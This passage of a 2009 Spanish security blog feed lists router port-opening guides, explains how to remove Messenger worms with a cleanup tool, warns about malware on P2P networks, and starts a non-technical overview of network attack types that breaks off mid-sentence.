Ovislink DR-WG4S ________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/ovislink.html"&gt;http://www.adslzone.net/ovislink.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;=========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;SMC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- SMC 7204 BRA ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/smc7204.html"&gt;http://www.adslzone.net/smc7204.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- SMC 7804 WBRA __________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/smc7804.html"&gt;http://www.adslzone.net/smc7804.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- SMC 7401 BRA ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/smc7401Bra.html"&gt;http://www.adslzone.net/smc7401Bra.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- SMC 7904W BRA __________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/SMC-7904WBRA.html"&gt;http://www.adslzone.net/SMC-7904WBRA.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;SAGEM COMMUNICATION&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Sagem Fast 1200 __________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/sagem-Fast-1200.html"&gt;http://www.adslzone.net/sagem-Fast-1200.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Sagem 1500 ______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/sagem1500.html"&gt;http://www.adslzone.net/sagem1500.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;SIEMENS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Speedstream 5200 _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/speedstream5200.html"&gt;http://www.adslzone.net/speedstream5200.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Speedstream 5660 _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/speedstream5660.html"&gt;http://www.adslzone.net/speedstream5660.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;SUPERGRASS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Supergrass DYN04+ _________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/supergrassdyn04.html"&gt;http://www.adslzone.net/supergrassdyn04.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;TELSEY&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Telsey CPVA500 ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/telseyCPVA500.html"&gt;http://www.adslzone.net/telseyCPVA500.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;==========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;THOMSON&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Thomson 510 _______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/thomson510.html"&gt;http://www.adslzone.net/thomson510.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Thomson ST580i ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/thomsonst580i.html"&gt;http://www.adslzone.net/thomsonst580i.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Thomson 530 _______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/thomson530.html"&gt;http://www.adslzone.net/thomson530.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Thomson 545 _______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/thomson545.html"&gt;http://www.adslzone.net/thomson545.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Thomson 546 _______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/thomson546.html"&gt;http://www.adslzone.net/thomson546.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Thomson TcW 710 ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/thomsonTCW720.html"&gt;http://www.adslzone.net/thomsonTCW720.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;===========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;U.S.ROBOTICS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- US Robotics 9003 ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/robotics9003.html"&gt;http://www.adslzone.net/robotics9003.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- US Robotics 9105 ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/robotics9105.html"&gt;http://www.adslzone.net/robotics9105.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- US Robotics 9110 ____________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/robotics9110.html"&gt;http://www.adslzone.net/robotics9110.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;===========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;DRAYTEK&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- DrayTek Vigor 2600 ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/vigor2600.html"&gt;http://www.adslzone.net/vigor2600.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;===========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;SCIENTIFIC ATLANTA&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Webstar 2320 ________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/webstar2320.html"&gt;http://www.adslzone.net/webstar2320.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;===========================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;XAVI&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;----------------------------&lt;br /&gt;&lt;br /&gt;- Xavi x7028r Wireless ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/xavi7028.html"&gt;http://www.adslzone.net/xavi7028.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Xavi x7768r Wireless ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/xavi7768r.html"&gt;http://www.adslzone.net/xavi7768r.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Xavi x7868r Wireless ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/xavi7868r.html"&gt;http://www.adslzone.net/xavi7868r.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Xavi x8121r Wireless ___________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/xavi8121r.html"&gt;http://www.adslzone.net/xavi8121r.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;============================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;ZOOM&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-----------------------------&lt;br /&gt;&lt;br /&gt;- Zoom X5 _____________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zoomX5.html"&gt;http://www.adslzone.net/zoomX5.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zoom X5 5554A _______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zoomX55554A.html"&gt;http://www.adslzone.net/zoomX55554A.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zoom X6 _____________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zoomX6.html"&gt;http://www.adslzone.net/zoomX6.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;============================================================================&lt;br /&gt;&lt;br /&gt;// * &lt;span style="color: rgb(255, 0, 64);"&gt;&lt;span style="font-weight: bold;"&gt;ZYXEL&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;-----------------------------&lt;br /&gt;&lt;br /&gt;- Zyxel P623-41 ________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel623-41.html"&gt;http://www.adslzone.net/zyxel623-41.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zyxel P643 ____________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel643.html"&gt;http://www.adslzone.net/zyxel643.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zyxel P645R-A1 ________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel645.html"&gt;http://www.adslzone.net/zyxel645.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zyxel P650HW _________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel650.html"&gt;http://www.adslzone.net/zyxel650.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zyxel P660HW _________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel660.html"&gt;http://www.adslzone.net/zyxel660.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zyxel P660H-D1 ________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/configurar-zyxel660h-d1.html"&gt;http://www.adslzone.net/configurar-zyxel660h-d1.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- Zyxel P660HW-D1 ______________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel660hw-d1.html"&gt;http://www.adslzone.net/zyxel660hw-d1.html&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;- ZyAir G-2000 __________________________ &gt; &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.adslzone.net/zyxel-airG2000.html"&gt;http://www.adslzone.net/zyxel-airG2000.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;fuente: indetectables.net&lt;br /&gt;&lt;!-- m --&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-5843544198203340198?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/5843544198203340198/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/abrir-puertos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5843544198203340198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5843544198203340198'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/abrir-puertos.html' title='Abrir Puertos'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mFMUaCwtbag/SvgCaj2He7I/AAAAAAAAAC8/F66tobs6hBM/s72-c/Dibujo.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4611927894314008347</id><published>2009-11-05T12:41:00.000+01:00</published><updated>2009-11-05T12:55:58.760+01:00</updated><title type='text'>CÓMO ELIMINAR LOS VIRUS QUE ENTRAN POR WINDOWS LIVE MESSENGER</title><content type='html'>&lt;span style="color: rgb(0, 0, 255);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;“Lobos con piel de cordero”:&lt;!--colorc--&gt;&lt;/span&gt;&lt;!--/colorc--&gt; Este tipo de virus se propaga a través de “aparentemente inofensivos” archivos de fotos (.jpg, .jpeg, .gif, etc.) que son enviados mediante enlaces, bien por alguno de nuestros contactos o bien por desconocidos que han accedido a nuestra dirección de correo hotmail, mientras chateamos (mensaje instantáneo) o en un mensaje normal con el programa Windows Live Messenger; cuando en realidad son auténticos ejecutables (.exe), ya que, al pinchar sobre ellos, introducirán el virus en nuestro PC, autoenviarán el enlace que descarga el virus en un mensaje instantáneo a los contactos de nuestra lista e inutilizarán por completo el programa Messenger.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mFMUaCwtbag/SvK6SsxT6cI/AAAAAAAAACk/8Por6ecqMys/s1600-h/51028711xt2.jpg"&gt;&lt;img style="cursor: pointer; width: 171px; height: 129px;" src="http://2.bp.blogspot.com/_mFMUaCwtbag/SvK6SsxT6cI/AAAAAAAAACk/8Por6ecqMys/s320/51028711xt2.jpg" alt="" id="BLOGGER_PHOTO_ID_5400583733589043650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;PROCESO DE DEINFECCIÓN&lt;/strong&gt;&lt;strong&gt; Y REPARAC&lt;/strong&gt;&lt;strong&gt;IÓ&lt;/strong&gt;&lt;strong&gt;N DE WINDOWS LIVE MESSENGER:&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;1. Descarga la utilidad &lt;!--colorc--&gt;&lt;/span&gt;&lt;!--/colorc--&gt;&lt;a target="_blank" href="http://rapidshare.com/files/258099971/msn_e-fix.zip"&gt;&lt;strong&gt;MSNFix&lt;/strong&gt;&lt;/a&gt; &lt;/p&gt;&lt;p&gt;&lt;!--coloro:#0000FF--&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;&lt;!--/coloro--&gt;2. Abre la carpeta MSNFix y descomprime (extrae) el contenido en C:\MSNFix&lt;br /&gt;(deberás crear la carpeta) pulsando sobre MSNFix.bat.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;3. Abre la nueva carpeta C:\MSNFix y haz clic sobre MSNFix.bat&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mFMUaCwtbag/SvK64qjZCMI/AAAAAAAAACs/Oaw90g5PBJA/s1600-h/34221312gp7.jpg"&gt;&lt;img style="cursor: pointer; width: 236px; height: 239px;" src="http://4.bp.blogspot.com/_mFMUaCwtbag/SvK64qjZCMI/AAAAAAAAACs/Oaw90g5PBJA/s320/34221312gp7.jpg" alt="" id="BLOGGER_PHOTO_ID_5400584385828817090" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;4. En la ventana en modo MS-DOS, escoge el idioma español pulsando la tecla C y presiona ENTER.&lt;/span&gt; &lt;/p&gt;&lt;p&gt;5. Haz clic sobre la tecla R y presiona ENTER para comenzar el proceso de detección (búsqueda).&lt;/p&gt;&lt;p style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mFMUaCwtbag/SvK7JnJo0rI/AAAAAAAAAC0/bJjtjcmu22k/s1600-h/57576779it8.jpg"&gt;&lt;img style="cursor: pointer; width: 320px; height: 188px;" src="http://3.bp.blogspot.com/_mFMUaCwtbag/SvK7JnJo0rI/AAAAAAAAAC0/bJjtjcmu22k/s320/57576779it8.jpg" alt="" id="BLOGGER_PHOTO_ID_5400584676973269682" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;6. Cuando haya finalizado, indicará lo siguiente:&lt;/span&gt; &lt;p&gt;# “No encontrado”: No se ha encontrado ningún programa malintencionado. Pulsa la letra Q para salir.&lt;br /&gt;# “Infección presente o detectada”: Presiona la tecla N para comenzar el proceso de desinfección.&lt;!--colorc--&gt;&lt;!--/colorc--&gt;&lt;/p&gt; &lt;p align="center"&gt;&lt;img style="width: 332px; height: 194px;" src="http://img255.imageshack.us/img255/9333/51759301mg6.jpg" class="linked-image" border="0" /&gt;&lt;/p&gt;&lt;p style="text-align: left;"&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;7. Una vez finalizada la desinfección, se abrirá un informe (log) .txt indicando los archivos y claves del registro relacionados con el virus que han sido eliminados.&lt;br /&gt;Por último, reinicia el PC para guardar los cambios.&lt;!--colorc--&gt;&lt;/span&gt;&lt;!--/colorc--&gt; &lt;/p&gt;&lt;p align="center"&gt;&lt;img style="width: 297px; height: 289px;" src="http://img212.imageshack.us/img212/6654/50761414ey0.jpg" class="linked-image" border="0" /&gt;&lt;/p&gt; &lt;p&gt;Esto es todo&lt;br /&gt;&lt;/p&gt;&lt;p&gt;fuente: lestathijackthis.wordpress.com&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4611927894314008347?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4611927894314008347/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-eliminar-los-virus-que-entran-por.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4611927894314008347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4611927894314008347'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-eliminar-los-virus-que-entran-por.html' title='CÓMO ELIMINAR LOS VIRUS QUE ENTRAN POR WINDOWS LIVE MESSENGER'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mFMUaCwtbag/SvK6SsxT6cI/AAAAAAAAACk/8Por6ecqMys/s72-c/51028711xt2.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2634323172027275678</id><published>2009-11-03T12:51:00.000+01:00</published><updated>2009-11-03T12:54:40.826+01:00</updated><title type='text'>Mi mulita me engaña</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mFMUaCwtbag/SvAZ7xmewZI/AAAAAAAAACc/hr452neEu_I/s1600-h/1216732888614_f.jpg"&gt;&lt;img style="cursor: pointer; width: 226px; height: 320px;" src="http://4.bp.blogspot.com/_mFMUaCwtbag/SvAZ7xmewZI/AAAAAAAAACc/hr452neEu_I/s320/1216732888614_f.jpg" alt="" id="BLOGGER_PHOTO_ID_5399844467934937490" border="0" /&gt;&lt;/a&gt;&lt;div class="snap_preview"&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Cualquier persona que esté relacionada con la tecnología conocerá el poder de las redes &lt;a href="http://es.wikipedia.org/wiki/P2p" title="P2P"&gt;P2P&lt;/a&gt;, sea cual sea el motivo para el cual las usa.&lt;/p&gt; &lt;p&gt;Lo importante en este caso es conocer que estas redes también son utilizadas para propagar malware. Por ejemplo a continuación se busca un libro y como puede verse en la imagen, aparecen dos grupos perfectamente definidos: por un lado aparecen archivos con gran cantidad de disponibilidad (más de 4.000 fuentes) y por el otro, archivos con baja disponibilidad:&lt;/p&gt; &lt;p style="text-align: center;"&gt;&lt;a href="http://blogs.eset-la.com/laboratorio/wp-content/uploads/2008/03/emule.png" title="Enlaces falsos en Emule"&gt;&lt;img src="http://blogs.eset-la.com/laboratorio/wp-content/uploads/2008/03/emule.png" alt="Enlaces falsos en Emule" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Cualquier usuario tendería a descargar aquellos archivos con alta disponibilidad y con esto caerá en la trampa tendida por los diseminadores de malware. Estos archivos aparecen con nombre aleatorio, y generalmente muy llamativos, sea cual sea la búsqueda realizada originalmente.&lt;/p&gt; &lt;p&gt;Estos archivos en realidad son &lt;a href="http://blogs.eset-la.com/laboratorio/2008/02/22/adware-fabrica-pop-pups/" title="Adware"&gt;adware&lt;/a&gt;, spyware, programas &lt;a href="http://blogs.eset-la.com/laboratorio/2008/02/28/falsas-aplicaciones-seguridad/" title="Rogue"&gt;rogue&lt;/a&gt;, &lt;a href="http://blogs.eset-la.com/laboratorio/2007/12/10/codecs-para-todos-gustos-zlob/" title="Codecs"&gt;falsos codecs&lt;/a&gt; y toda una parafernalia de archivos dañinos de diferente tipo.&lt;/p&gt; &lt;p&gt;Aconsejamos prestar especial atención en este detalle para no terminar descargando un malware, bajo la creencia que es el último libro de Shakespeare.&lt;/p&gt; &lt;p&gt;Fuente: blogs.eset-la.com&lt;/p&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2634323172027275678?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2634323172027275678/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/mi-mulita-me-engana.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2634323172027275678'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2634323172027275678'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/mi-mulita-me-engana.html' title='Mi mulita me engaña'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mFMUaCwtbag/SvAZ7xmewZI/AAAAAAAAACc/hr452neEu_I/s72-c/1216732888614_f.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-7473483072300072314</id><published>2009-11-01T11:09:00.000+01:00</published><updated>2009-11-01T11:15:21.205+01:00</updated><title type='text'>Tipos de ataques hacking</title><content type='html'>&lt;b&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;Ahora les dejo algunos de los tipos de ataques que puede sufrir un sistema en la red son tipos de ataque que puede sufrir o mejor aun que &lt;b&gt;podemos hacer, &lt;/b&gt;no son explicaciones tecnicas ni descripciones de como hacer un ataque, por ahora solo les dejo esto como cultura general&lt;br /&gt;&lt;br /&gt;Los métodos de ataque descritos a continuación están divididos en categorías generales que pueden estar relacionadas entre sí, ya que el uso de un método en una categoría permite el uso de otros métodos en otras. Por ejemplo: después de hackear un password, un intruso realiza un login como usuario legítimo para navegar entre los archivos y explotar vulnerabilidades del sistema. Eventualmente también, el atacante puede adquirir derechos a lugares que le permitan dejar un virus u otras bombas lógicas para paralizar todo un sistema antes de huir.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;EAVESDROPPING Y PACKET SNIFFING &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Muchas redes son vulnerables al eavesdropping, o la pasiva intercepción (sin modificación) del tráfico de red. En Internet esto es realizado por packet sniffers, que son programas que monitorean los paquetes de red que están direccionados a la **** donde están instalados. El sniffer puede ser colocado tanto en una estación de trabajo conectada a red, como a un equipo router o a un gateway de Internet, y esto puede ser realizado por un usuario con legítimo acceso, o por un intruso que ha ingresado por otras vías. Existen kits disponibles para facilitar su instalación.&lt;br /&gt;Este método es muy utilizado para capturar logins, IP‘s y passwords de usuarios, que generalmente viajan claros (sin encriptar) al ingresar a sistemas de acceso remoto (RAS). También son utilizados para capturar números de tarjetas de crédito y direcciones de e-mail entrantes y salientes. El análisis de tráfico puede ser utilizado también para determinar relaciones entre organizaciones e individuos.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;SNOOPING Y DOWNLOADING &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Los ataques de esta categoría tienen el mismo objetivo que el sniffing, obtener la información sin modificarla. Sin embargo los métodos son diferentes. Además de interceptar el tráfico de red, el atacante ingresa a los documentos, mensajes de e-mail y otra información guardada, realizando en la mayoría de los casos un downloading de esa información a su propia ****.&lt;br /&gt;El Snooping puede ser realizado por simple curiosidad, pero también es realizado con fines de espionaje y robo de información o software. Los casos más resonantes de este tipo de ataques fueron: el robo de un archivo con mas de 1700 números de tarjetas de crédito desde una compañía de música Mundialmente famosa, y la difusión ilegal de reportes oficiales reservados de las Naciones Unidas, acerca de la violación de derechos humanos en algunos países europeos en estado de guerra.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TAMPERING O DATA DIDDLING &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Esta categoría se refiere a la modificación desautorizada a los datos, o al software instalado en un sistema, incluyendo borrado de archivos. Este tipo de ataques son particularmente serios cuando el que lo realiza ha obtenido derechos de administrador o supervisor, con la capacidad de disparar cualquier comando y poder alterar o borrar cualquier información que puede incluso terminar en la baja total del sistema en forma deliberada. O aún si no hubo intenciones de ello, el administrador posiblemente necesite dar de baja por horas o días hasta chequear y tratar de recuperar aquella información que ha sido alterada o borrada. Como siempre, esto puede ser realizado por insiders o outsiders, generalmente con el propósito de fraude o dejar fuera de servicio un competidor.&lt;br /&gt;Son innumerables los casos de este tipo como empleados (o externos) bancarios que crean falsas cuentas para derivar fondos de otras cuentas, estudiantes que modifican calificaciones de exámenes, o contribuyentes que pagan para que se les anule la deuda por impuestos en el sistema municipal.&lt;br /&gt;Múltiples web han sido víctimas del cambio de sus home page por imágenes terroristas o humorísticas, o el reemplazo de versiones de software para cambiarlos por otros con el mismo nombre pero que incorporan código malicioso (virus, troyanos).&lt;br /&gt;La 